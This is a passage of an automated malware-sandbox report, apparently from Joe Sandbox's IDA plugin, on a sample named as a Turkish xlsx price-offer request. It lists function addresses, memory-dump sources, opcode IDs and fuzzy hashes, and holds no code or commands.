                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 175b651256d5ae0a25b93931bde03805e50b89bed97da042d2efebecff7c06bf
                                                  • Instruction ID: 023e508bb141e6d6e2dc707a4fe3edf76c3f5bc6b35357d83b164e6941fc2a2e
                                                  • Opcode Fuzzy Hash: 175b651256d5ae0a25b93931bde03805e50b89bed97da042d2efebecff7c06bf
                                                  • Instruction Fuzzy Hash: 23F09B7881C344AFCB01DF90D8549ADBF72AB5A311F15C0EADC4457362D7318E55DB91
                                                  Function 05ADE5F8 Relevance: .0, Instructions: 23COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cf0d7cae6644e839b289adbb46ed8e65dc2a3585ed780d4c91db4086413866f5
                                                  • Instruction ID: d57157e3e4e406af5cf9d1ca9fc368fa802603369cca5d5837b1904a941909ea
                                                  • Opcode Fuzzy Hash: cf0d7cae6644e839b289adbb46ed8e65dc2a3585ed780d4c91db4086413866f5
                                                  • Instruction Fuzzy Hash: 1DE086303503045BCE58B7689D04F62B3EDEB46610F540869D61B5F280D962E8018B71
                                                  Function 05AD91A1 Relevance: .0, Instructions: 23COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 16fe456106eae53201406116c07f5a42d249a492b86fd8e75bca7c596a517551
                                                  • Instruction ID: 3ee680707333b8069838b3bd6867be938c70e0e0fe5762d3b3180bbf3a961edc
                                                  • Opcode Fuzzy Hash: 16fe456106eae53201406116c07f5a42d249a492b86fd8e75bca7c596a517551
                                                  • Instruction Fuzzy Hash: B4E02C38C0A208EFC748EFA0E8047EEBBB4EB02302F2045B8D80423344C3308A90CBA4
                                                  Function 05AD7D7B Relevance: .0, Instructions: 23COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 492e5ac02173a651b09bbf668a4ea6e12892448d19c5ba6830bd7cbe788cdab7
                                                  • Instruction ID: 8f0cce3e85fcf60d05f77eb68d15e58a82f20f1f167cc87e0d4ee5be54b0e852
                                                  • Opcode Fuzzy Hash: 492e5ac02173a651b09bbf668a4ea6e12892448d19c5ba6830bd7cbe788cdab7
                                                  • Instruction Fuzzy Hash: A0E0E530A14248AFC785EFA8D445BBCFBB5EB48215F2481A9984AD3341D632AA51CBA1
                                                  Function 05AD9A8C Relevance: .0, Instructions: 23COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a779d675d4da85177bb4807d158ec8a6902c3cfe7748132bc28950cb0a23412b
                                                  • Instruction ID: 29210b44391ae02d2c9dc1063fcb0bd6d8ae9e7a2d47f84c439334971c440b38
                                                  • Opcode Fuzzy Hash: a779d675d4da85177bb4807d158ec8a6902c3cfe7748132bc28950cb0a23412b
                                                  • Instruction Fuzzy Hash: BCE0D8B390D1808FCB159B28AC55C627F36E96224074441D5D4098B025E228C907E760
                                                  Function 05E02730 Relevance: .0, Instructions: 23COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 881b4bd1017e9003b4b03e92284eee6b2cc2ff715199d54087d9d6c7ce7176be
                                                  • Instruction ID: 61cd96a2a95385c0f5339ee36f8cd8a51ccd0eca29152e7731c4541e608d740e
                                                  • Opcode Fuzzy Hash: 881b4bd1017e9003b4b03e92284eee6b2cc2ff715199d54087d9d6c7ce7176be
                                                  • Instruction Fuzzy Hash: 39E06539808108EBCB01CF94E8449ADBBB6FB48300F149099ED44232A1C7329A61EB80
                                                  Function 05E06650 Relevance: .0, Instructions: 23COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4c83530fb4bb6df1e86cddccc2597814d18419bf5ba3e0454d18b7dd2f0ddadd
                                                  • Instruction ID: 835a40998185a707d584ad01591f8df4374d1473ef811edfe737e2a5d85eb71c
                                                  • Opcode Fuzzy Hash: 4c83530fb4bb6df1e86cddccc2597814d18419bf5ba3e0454d18b7dd2f0ddadd
                                                  • Instruction Fuzzy Hash: ADE0C270447208DFC305D764E8467ADB73DE702605F1021ACD80516291C7769850CB80
                                                  Function 05E04800 Relevance: .0, Instructions: 23COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b57fe18cad7f83ea28f38467268508d67372e434cb56da14f0af42a1c669f675
                                                  • Instruction ID: 3f636b5839eef211f3d15c8ba8b523bfb520f9bb335b69f5f37578992f711fbe
                                                  • Opcode Fuzzy Hash: b57fe18cad7f83ea28f38467268508d67372e434cb56da14f0af42a1c669f675
                                                  • Instruction Fuzzy Hash: 41F03974804248EFCF05CF94D940AACBBB5FB48310F10C4AAEC54523A1C7329A61EF90
                                                  Function 05E399A8 Relevance: .0, Instructions: 23COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063678264.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e20000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 39cdcd1b8cae41645c69a6382d0f057cf82016d3c850236ae3b1f911091168b0
                                                  • Instruction ID: eeec0bf3037de648f981718543d649054520e9d580ef1615a636134318f46b98
                                                  • Opcode Fuzzy Hash: 39cdcd1b8cae41645c69a6382d0f057cf82016d3c850236ae3b1f911091168b0
                                                  • Instruction Fuzzy Hash: E4E0C974D05208EFCB44DFA8D84569CBBF5FB48311F10C1A99C4993351E7719A51DF80
                                                  Function 05E3AD68 Relevance: .0, Instructions: 23COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063678264.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e20000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 39cdcd1b8cae41645c69a6382d0f057cf82016d3c850236ae3b1f911091168b0
                                                  • Instruction ID: 676297d70ac22572bd082841348eba6bbd3e0d6322eabde39ad1fe06638eea22
                                                  • Opcode Fuzzy Hash: 39cdcd1b8cae41645c69a6382d0f057cf82016d3c850236ae3b1f911091168b0
                                                  • Instruction Fuzzy Hash: E2E0C974D04208EFCB44DFA8D4456ACBBF5FB88315F10C1A9984993351D7329A51DF80
                                                  Function 05E35718 Relevance: .0, Instructions: 23COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063678264.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e20000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 39cdcd1b8cae41645c69a6382d0f057cf82016d3c850236ae3b1f911091168b0
                                                  • Instruction ID: ed1f20c783bdcb6fd8684444b789c955b36ebe83c019a78942ca7832324ae5df
                                                  • Opcode Fuzzy Hash: 39cdcd1b8cae41645c69a6382d0f057cf82016d3c850236ae3b1f911091168b0
                                                  • Instruction Fuzzy Hash: 8CE0C974D04208EFCB44DFA8D48569CBBF5FB58315F10C1AA9C4993351D7319A51DF80
                                                  Function 05E222D6 Relevance: .0, Instructions: 23COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063678264.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e20000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ca3e0c8190d73493e2c2f26233559aadd940f776d902ed3985bf14905799b110
                                                  • Instruction ID: 624850129061d245851506f20d62b89e74c2428207f96bb1bf8603e8609581c8
                                                  • Opcode Fuzzy Hash: ca3e0c8190d73493e2c2f26233559aadd940f776d902ed3985bf14905799b110
                                                  • Instruction Fuzzy Hash: 11F03A74A012188FDB20DF58D848A99B7BAFB89700F1040DAE40DA3355DB34AE818F61
                                                  Function 05E3CE48 Relevance: .0, Instructions: 23COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063678264.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e20000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 39cdcd1b8cae41645c69a6382d0f057cf82016d3c850236ae3b1f911091168b0
                                                  • Instruction ID: 6b3fef8b1430f309f4b44116ca99496694cb584fb31d38c345ee25f440adde27
                                                  • Opcode Fuzzy Hash: 39cdcd1b8cae41645c69a6382d0f057cf82016d3c850236ae3b1f911091168b0
                                                  • Instruction Fuzzy Hash: A2E0C274E14208EFCB44DFA9D445AADBBF5FB48311F20C1AA9849A3351D732AA65DF80
                                                  Function 05E3FE10 Relevance: .0, Instructions: 23COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063678264.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e20000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e9eda44b66d8e89bf62e2a92af2c8cac13b40cf2c8ccb4984dfc39b4e61948a8
                                                  • Instruction ID: ec9908a7a57969a8d239472b577d057ebede657981609a96f4a02a237b9c8f9d
                                                  • Opcode Fuzzy Hash: e9eda44b66d8e89bf62e2a92af2c8cac13b40cf2c8ccb4984dfc39b4e61948a8
                                                  • Instruction Fuzzy Hash: 91E03974C08108AFCB40DF99D4419ACBBB5EB48211F10C0AAAC9896242D6359A15DB90
                                                  Function 05AEE850 Relevance: .0, Instructions: 22COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7b103ae332914c4d9adcc9e54739a1b673dc20140609c76630744f7d982b1112
                                                  • Instruction ID: 54063bdeaed4317043c16d58370f7e9c8d53ebdadf5a37ec16948607c3da3544
                                                  • Opcode Fuzzy Hash: 7b103ae332914c4d9adcc9e54739a1b673dc20140609c76630744f7d982b1112
                                                  • Instruction Fuzzy Hash: DEE0E574D08108AFC744DF99D440AACBBB9EB48301F10C1AAA81897341C731AA51DB90
                                                  Function 057E8140 Relevance: .0, Instructions: 22COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c84b8de8faf7321ede2e540df19cea18690a9b69da88f965c589337349899f8d
                                                  • Instruction ID: afb53c80ce8c8393c8dec8056bf75d83da780bbc11142318da6b61af7721b67f
                                                  • Opcode Fuzzy Hash: c84b8de8faf7321ede2e540df19cea18690a9b69da88f965c589337349899f8d
                                                  • Instruction Fuzzy Hash: 63E0E570D15208EFCB54DFA8D44069DBBB6EB48301F5085A99808A2351D7359A51EF82
                                                  Function 05AD64B0 Relevance: .0, Instructions: 22COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5c736215a126514cd41422b0a1a86cd169726b3e9ad3feb26336ba5f403b77c0
                                                  • Instruction ID: eb2e8e4232accce79deff8dd709c94d7013899101b0fd6a582f12ec33739dc5b
                                                  • Opcode Fuzzy Hash: 5c736215a126514cd41422b0a1a86cd169726b3e9ad3feb26336ba5f403b77c0
                                                  • Instruction Fuzzy Hash: 94E065B0D05208EFCB40EFA8D000AADBBB5EB08300F00C0A9D909A3300D3359A50DF80
                                                  Function 05AD743C Relevance: .0, Instructions: 22COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b78af0839136014c2e353eb69637bd60d19f74f28be41dbdca90d90ba3faf5cc
                                                  • Instruction ID: 9c32241d4566fe2dce6a330f392ed4b38950ec1dd8008d8d58f17b2d3e9c0c29
                                                  • Opcode Fuzzy Hash: b78af0839136014c2e353eb69637bd60d19f74f28be41dbdca90d90ba3faf5cc
                                                  • Instruction Fuzzy Hash: 40F05E785042589FD715AF14D8A4B9C7BB1FB09201F108299904BA3352DA350D45CF25
                                                  Function 05AD92B8 Relevance: .0, Instructions: 22COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 487cedc11e80ce80319596d8c47cecafaebb6c15d92359aa4e15f547460ee34e
                                                  • Instruction ID: cbc518afb9306936ff996fd61d16f50ad9eabd8720efe7efaec776bbc99e3dd6
                                                  • Opcode Fuzzy Hash: 487cedc11e80ce80319596d8c47cecafaebb6c15d92359aa4e15f547460ee34e
                                                  • Instruction Fuzzy Hash: 3AE0E574E04208EFCB44EFA8D440AADFBF5EB49300F10C1A99819A3341D735AA02CF80
                                                  Function 05AD8808 Relevance: .0, Instructions: 22COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 487cedc11e80ce80319596d8c47cecafaebb6c15d92359aa4e15f547460ee34e
                                                  • Instruction ID: f10e92f7d8230a61414445d5c4c792c88307e0a2d0a06a495add2d371b45a181
                                                  • Opcode Fuzzy Hash: 487cedc11e80ce80319596d8c47cecafaebb6c15d92359aa4e15f547460ee34e
                                                  • Instruction Fuzzy Hash: 34E0C274E04208EFCB44EFA8D440AACFBF5FB48300F10C1A9D81993341D635AA02CF80
                                                  Function 05AD7A5C Relevance: .0, Instructions: 22COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8575eb36b36635f355aaea5203b05f4e81333e4472155b346c6cb139fcca0767
                                                  • Instruction ID: bfab93829b3ebb5c45b5ae987ceb34074199cfdc4c97b36910342537fa9049f9
                                                  • Opcode Fuzzy Hash: 8575eb36b36635f355aaea5203b05f4e81333e4472155b346c6cb139fcca0767
                                                  • Instruction Fuzzy Hash: F0F06D7AA011188BD721EF14D8987DDBB72FF59310F10819AE88EA3326DB784D82DF51
                                                  Function 05E00DF8 Relevance: .0, Instructions: 22COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 63228e6a121d1a348e97eebccb03b0fb3c1bfc36b39e23710268c7a198fe7247
                                                  • Instruction ID: c67bef8580a22292470ff23e2c9b25b33767eecedd1eab60f40db2e59e09777e
                                                  • Opcode Fuzzy Hash: 63228e6a121d1a348e97eebccb03b0fb3c1bfc36b39e23710268c7a198fe7247
                                                  • Instruction Fuzzy Hash: 82E0D875648549DFCB50CB78C5012A8FBF1FF05218B5850E9C4A997293D732AB33CB44
                                                  Function 05E05751 Relevance: .0, Instructions: 22COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a7850184782d108ec718cecd5ae0822c9a0790144336b0e931d499b7947dd21c
                                                  • Instruction ID: 55bc45f9659a99eed7f5d9906293cce69b232a2f2c76987bd63846e610ea973f
                                                  • Opcode Fuzzy Hash: a7850184782d108ec718cecd5ae0822c9a0790144336b0e931d499b7947dd21c
                                                  • Instruction Fuzzy Hash: D7E08638909108EBC704DF94E8819ACBB79EB45305F14D1ADDC4413391DB31AD46DFD0
                                                  Function 05E05D51 Relevance: .0, Instructions: 22COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 385b0a0fef8a35d3de988ff3c2172d1aaf33a29760c37a6df25256a2703c27bf
                                                  • Instruction ID: fb4aa4dc4d85f39086562e6f843111b9f3a9f943c20b6326326161491e3ac93c
                                                  • Opcode Fuzzy Hash: 385b0a0fef8a35d3de988ff3c2172d1aaf33a29760c37a6df25256a2703c27bf
                                                  • Instruction Fuzzy Hash: C9E08678909108EBC704DF94E885AADFB79EB45315F1091AEDC4427391DB329D43DF91
                                                  Function 05E00752 Relevance: .0, Instructions: 22COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7e0954576bf08fef0c4b7a0b3155bfc9695f98546c810a372f51834affdecddd
                                                  • Instruction ID: c0a515ee68be4bd8def5e6069250f9447a8e6336cd1f41237f553b7c7a9e35b6
                                                  • Opcode Fuzzy Hash: 7e0954576bf08fef0c4b7a0b3155bfc9695f98546c810a372f51834affdecddd
                                                  • Instruction Fuzzy Hash: D2E02C381A8004EBC315DAA0C90ABBCB7B5EB81308F28A098CC0C43392C732BD43CF81
                                                  Function 05AEB561 Relevance: .0, Instructions: 21COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 79fc3fe74e5e9b7dcb2da88369f716ac04a88e884a7ecd7a526ce23f26c2e450
                                                  • Instruction ID: 65ca4523ab364936653dbde0422072b68579506424fa6b754838a888eecf63fc
                                                  • Opcode Fuzzy Hash: 79fc3fe74e5e9b7dcb2da88369f716ac04a88e884a7ecd7a526ce23f26c2e450
                                                  • Instruction Fuzzy Hash: 29E08C70519008CFC745CFA8E444AFCBBB6EB92309F2481E9980DE3662C7329D07CB60
                                                  Function 05AEEC55 Relevance: .0, Instructions: 21COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3943dc84ef7c81aabda0f18d6a18fea652e3d02ffcb9d90a36c6faacdd63cce7
                                                  • Instruction ID: aa8430df9587fa59c94f54719b2196e6cfbaf22c30987eadfe10d676c6966b10
                                                  • Opcode Fuzzy Hash: 3943dc84ef7c81aabda0f18d6a18fea652e3d02ffcb9d90a36c6faacdd63cce7
                                                  • Instruction Fuzzy Hash: 72F0D470905248CFEB54CF59D444B9CBBF6FB05304F4084A9D11AA7285D7755D85CF11
                                                  Function 05E05360 Relevance: .0, Instructions: 21COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4ba48e0e5ba1c897a7f4914161efbee3f44f4b7e03aa1867217ddae65bf211d5
                                                  • Instruction ID: d3a80ec942139b1c523b627517d58c3adf8e6c5cbd037dbb83669d16ce9d4157
                                                  • Opcode Fuzzy Hash: 4ba48e0e5ba1c897a7f4914161efbee3f44f4b7e03aa1867217ddae65bf211d5
                                                  • Instruction Fuzzy Hash: 71E0E574D08208EFCB14DFA8E440AACBBB5EB48311F10D1AADC8453395D6769A51DF80
                                                  Function 05E05530 Relevance: .0, Instructions: 21COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4ba48e0e5ba1c897a7f4914161efbee3f44f4b7e03aa1867217ddae65bf211d5
                                                  • Instruction ID: f925a6f62d97c0abfc9d990d7a3ef6d90b3ba99df50150cadfd4777d6104fcc5
                                                  • Opcode Fuzzy Hash: 4ba48e0e5ba1c897a7f4914161efbee3f44f4b7e03aa1867217ddae65bf211d5
                                                  • Instruction Fuzzy Hash: A6E0E574908208EFCB44DF98D4419ACBBB6EB48315F10D1AA9C8453391D6329A91DF80
                                                  Function 031151E0 Relevance: .0, Instructions: 21COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a3ef724c11d1e5027a90b317914a97244e7888e4d12378af88a44f9cd6747c65
                                                  • Instruction ID: 2b3ef739628720abbcbce9ee1ef22fa7fedb9ee3a5bb1b905322222d856cc1ae
                                                  • Opcode Fuzzy Hash: a3ef724c11d1e5027a90b317914a97244e7888e4d12378af88a44f9cd6747c65
                                                  • Instruction Fuzzy Hash: 0CE0C230200114DFE7A2CA2AB8403E232DFF3CE310F5880B1E80D81504E37595A18501
                                                  Function 05E3F1D8 Relevance: .0, Instructions: 21COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
